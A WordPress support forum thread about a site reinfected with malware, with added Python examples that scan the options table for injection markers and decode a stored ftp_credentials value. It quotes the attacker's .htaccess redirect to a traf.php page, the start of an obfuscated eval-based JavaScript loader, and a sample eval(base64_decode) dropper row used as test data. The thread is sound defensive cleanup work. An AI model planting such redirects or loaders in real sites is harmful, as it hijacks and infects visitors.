• After cleaning my site entirely and changing the db user and its password to 50 random chars, as well as the ONLY account, admin, to another 50 random chars; deleting the entire old installation and all plugins and the theme as well, and of course new salt keys; then reinstalling everything fresh AND adding very, very strict .htaccess files in ALL folders and root – the fu***ng malware code again appeared in my root .htaccess and in the theme's header code. This must mean that something must be stored somewhere in my DB, of course encoded, but how on earth am I supposed to find this shit and kill it once and for all??
    I am willing to crawl through every single row in order to get rid of this pest, but I really do not know what I am looking for.
    Any ideas?

Viewing 15 replies - 1 through 15 (of 17 total)
  • The back door might not be in the database but hidden in your uploads folder. See https://ottopress.com/2009/hacked-wordpress-backdoors/

    Thread Starter ThorHammer

    (@thorhammer)

    Thanks for your reply. Sadly, my upload dir is clean as water. All years. Each month… I have checked everything. It has to be something in the database.

    Have you spoken to your hosts? This could be a server security issue – not a WP one – especially since the root .htaccess was targeted.

    Thread Starter ThorHammer

    (@thorhammer)

    Yes, I have spoken to them, but they are not willing to take any responsibility.
    By the way, the code inserted into my .htaccess and my theme's header is easy to find; it always starts with #336988#, with the code in between, and ends with a trailing slash.
    In .htaccess this entry is cleared: RewriteRule ^(.*)$ https://digitalphoto-art.it/traf.php [R=301,L]

    The malware code in the header template is PHP echoing a JavaScript which starts like this: dbshre=220;try{window.document.body*=2}catch(gdsgsdg){if(dbshre){zaq=0;try{v=document.createElement(\"div\");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(31,94,11 etc etc.

    I have spoken to them, but they are not willing to take any responsibility.

    Time to change hosts, perhaps? Have you changed all of your ftp and hosting account management passwords in case you had an ftp leak?

    From what you describe above, I can’t see how anything in the database could be responsible for this. It really does smack of a compromised server, but just to be on the safe side, do you have any pre-hack database backups?

    Thread Starter ThorHammer

    (@thorhammer)

    Yes, I do have an old DB backup, but it is of course missing some entries. And yes, I have changed all passwords – everything.

    Thread Starter ThorHammer

    (@thorhammer)

    After googling myself to death I have found something that might be a very, very odd row in my OPTIONS table:

    -- phpMyAdmin's generated search: LIKE with no wildcard is plain equality,
    -- and option_id / autoload can never equal this string, so only two columns matter.
    SELECT *
    FROM `my_damn_database`.`my_damn_database_options`
    WHERE option_name = 'ftp_credentials'
       OR option_value = 'ftp_credentials'
    LIMIT 0, 30;

    Should I delete this row? Now?
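An added example, not code from this thread or from WordPress: rather than a phpMyAdmin search for one literal option name, scan every option_value for the markers quoted earlier in the thread (the #336988# delimiter, the traf.php redirect, the obfuscated-JS prologue) and for generic PHP/JS injection signatures, and report whether each hit is autoloaded. The wp_options rows are constructed sample data held in an in-memory SQLite table so the script runs offline; against a live site the same SELECT runs over a MySQL connection. A hit is a row to inspect by hand, not proof of infection.

```python
import re
import sqlite3

# Markers quoted in this thread (#336988#, traf.php, the JS prologue) plus
# generic PHP/JS signatures typical of payloads stashed in wp_options,
# often inside transients or theme_mods, and autoloaded on every request.
SUSPICIOUS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"#336988#",
        r"traf\.php",
        r"window\.document\.body\*=2",
        r"\beval\s*\(",
        r"base64_decode\s*\(",
        r"gzinflate\s*\(",
        r"<script\b",
        r"<\?php",
    )
]


def build_sample_db():
    """Constructed stand-in for a wp_options table (sample rows, not a real site).

    sqlite3 is used so the example runs offline; on a real site open a MySQL
    connection instead and run the same SELECT.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        """CREATE TABLE wp_options (
               option_id    INTEGER PRIMARY KEY,
               option_name  TEXT NOT NULL,
               option_value TEXT NOT NULL,
               autoload     TEXT NOT NULL DEFAULT 'yes')"""
    )
    rows = [
        ("siteurl", "https://example.com", "yes"),
        ("blogname", "My Site", "yes"),
        ("active_plugins", 'a:1:{i:0;s:19:"akismet/akismet.php";}', "yes"),
        # WordPress core itself writes this after an FTP-based update (no password).
        ("ftp_credentials",
         'a:3:{s:8:"hostname";s:15:"ftp.example.com";s:8:"username";'
         's:6:"wpuser";s:15:"connection_type";s:3:"ftp";}', "yes"),
        # Constructed injected rows: an autoloaded PHP dropper hidden in a
        # transient, and a header payload using the #336988# delimiter.
        ("_transient_wp_cache_x1",
         '<?php eval(base64_decode("ZWNobyAnaGknOw=="));', "yes"),
        ("theme_mods_twentyeleven",
         "#336988#<script>dbshre=220;try{window.document.body*=2}"
         "catch(gdsgsdg){}</script>", "yes"),
    ]
    conn.executemany(
        "INSERT INTO wp_options (option_name, option_value, autoload) VALUES (?, ?, ?)",
        rows,
    )
    return conn


def find_suspicious_options(conn):
    """Return [(option_name, autoload, pattern)] for every row whose value hits a marker.

    Matching in Python rather than chaining LIKE clauses keeps the patterns
    case-insensitive and avoids LIKE wildcard-escaping mistakes.
    """
    hits = []
    cur = conn.execute(
        "SELECT option_name, option_value, autoload FROM wp_options ORDER BY option_id"
    )
    for name, value, autoload in cur:
        for pat in SUSPICIOUS_PATTERNS:
            if pat.search(value):
                hits.append((name, autoload, pat.pattern))
                break
    return hits


if __name__ == "__main__":
    for name, autoload, pattern in find_suspicious_options(build_sample_db()):
        print(f"{name:28} autoload={autoload:3} matched {pattern}")
```

Autoloaded hits matter most: an option with autoload = yes is read and (if some plugin or theme evaluates it) executed on every page load, which is how an injection survives a clean reinstall of the files.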

    Thread Starter ThorHammer

    (@thorhammer)

    The information WordPress needs in order to update plugins, themes and core is stored in wp-config. The information I found in my DB (Options table) (the row with ftp_credentials) is actually the complete information needed to get full ftp access to my server…! This cannot be a standard WordPress insert?

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    This cannot be a standard wordpress insert?

    I’ve never looked myself as FTP is a horrible protocol for me but if you can setup a second instance of WordPress with a separate table prefix (so you don’t use the old installation) you can easily check.

    Can I just clarify that this was an option called ftp_credentials in the wp_option table? Just checked a couple of my sites & there’s nothing like this in the databases.

    Thread Starter ThorHammer

    (@thorhammer)

    Yes, Esmi. In the OPTIONS table I have a row with option_name: ftp_credentials

    The value is (almost – but it is straightforwardly the real ftp address and the real ftp login name, and yes, it is marked autoload YES):
    a:3:{s:8:"hostname";s:14:"webnumber51.theserver.com";s:8:"username";s:5:"the-real-username";s:15:"connection_type";s:3:"ftp";}
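Two checks on a value like that, as an added example (not code from this thread or from WordPress): a small decoder for the PHP serialize() format WordPress uses for option values, which rejects a string whose declared byte length does not match its contents, and a check of which keys the array actually carries. For context, WordPress core does write an `ftp_credentials` option itself: request_filesystem_credentials() in wp-admin/includes/file.php saves hostname, username and connection_type after unsetting the password, which is exactly the three keys shown above. The hostname, username and password below are constructed sample values.

```python
def php_unserialize(data: bytes):
    """Decode the subset of PHP serialize() output WordPress stores in options:
    N;  b:0|1;  i:<int>;  d:<float>;  s:<bytes>:"...";  a:<count>:{key;value;...}
    Declared string lengths are byte counts, so the input is bytes, not str.
    A length that disagrees with the data raises: that is how a hand-edited
    or injected value usually betrays itself.
    """
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError(f"trailing data at offset {pos}")
    return value


def _parse(buf: bytes, pos: int):
    t = buf[pos:pos + 1]
    if t == b"N":
        if buf[pos:pos + 2] != b"N;":
            raise ValueError(f"bad null at offset {pos}")
        return None, pos + 2
    if t in (b"i", b"d", b"b"):
        end = buf.index(b";", pos)
        raw = buf[pos + 2:end].decode("ascii")
        if t == b"i":
            val = int(raw)
        elif t == b"d":
            val = float(raw)
        else:
            val = raw == "1"
        return val, end + 1
    if t == b"s":
        colon = buf.index(b":", pos + 2)
        length = int(buf[pos + 2:colon])
        start = colon + 2                  # skip  :"
        end = start + length
        if buf[end:end + 2] != b'";':
            raise ValueError(f"string length mismatch at offset {pos}")
        return buf[start:end].decode("utf-8", "replace"), end + 2
    if t == b"a":
        colon = buf.index(b":", pos + 2)
        count = int(buf[pos + 2:colon])
        pos = colon + 2                    # skip  :{
        result = {}
        for _ in range(count):
            key, pos = _parse(buf, pos)
            val, pos = _parse(buf, pos)
            result[key] = val
        if buf[pos:pos + 1] != b"}":
            raise ValueError(f"expected '}}' at offset {pos}")
        return result, pos + 1
    raise ValueError(f"unsupported type {t!r} at offset {pos}")


# Keys WordPress core itself writes for this option (it unsets the password
# before update_option()); anything beyond these deserves a closer look.
CORE_FTP_KEYS = {"hostname", "username", "connection_type"}


def inspect_ftp_credentials(serialized: bytes):
    """Unpack an ftp_credentials option value and list any keys beyond the
    three core writes. Returns (decoded_dict, sorted_unexpected_keys)."""
    creds = php_unserialize(serialized)
    if not isinstance(creds, dict):
        raise ValueError("ftp_credentials should be a serialized array")
    return creds, sorted(set(creds) - CORE_FTP_KEYS)


# Constructed samples: the shape core writes, and a variant carrying a
# password, which core never stores.
CORE_SHAPE = (b'a:3:{s:8:"hostname";s:15:"ftp.example.com";'
              b's:8:"username";s:6:"wpuser";s:15:"connection_type";s:3:"ftp";}')
WITH_PASSWORD = (b'a:4:{s:8:"hostname";s:15:"ftp.example.com";'
                 b's:8:"username";s:6:"wpuser";s:15:"connection_type";s:3:"ftp";'
                 b's:8:"password";s:6:"hunter";}')

if __name__ == "__main__":
    for sample in (CORE_SHAPE, WITH_PASSWORD):
        creds, extra = inspect_ftp_credentials(sample)
        print(creds, "unexpected keys:", extra or "none")
```

The decoder is deliberately strict: a real unserialize() would also accept objects (O:) and references, but an option value that needs those, or whose byte lengths do not line up, is exactly the kind of row worth reading by hand.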

    I wonder if this came from a plugin? It’s definitely not in any of the the databases that I’ve looked at.

    [EDIT: I’ve asked for some more eyes on this.]

    Thread Starter ThorHammer

    (@thorhammer)

    Yes…because, it might be easy just to query the db and get this very, very important information…

    Do you use filezilla client?

    That ftp client stores all data without encryption, so if you have a Trojan on your PC, someone can access all your usernames, passwords and websites.

    Thread Starter ThorHammer

    (@thorhammer)

    No, José, I am using another FTP client, and yes, I have recently found a trojan on my PC and killed it. I have not checked whether this client stores the login information unencrypted as Filezilla does (as a very visible text file).
    But still: the table row I found in my options really does look suspicious.

  • The topic ‘Malware in DB – how to identify’ is closed to new replies.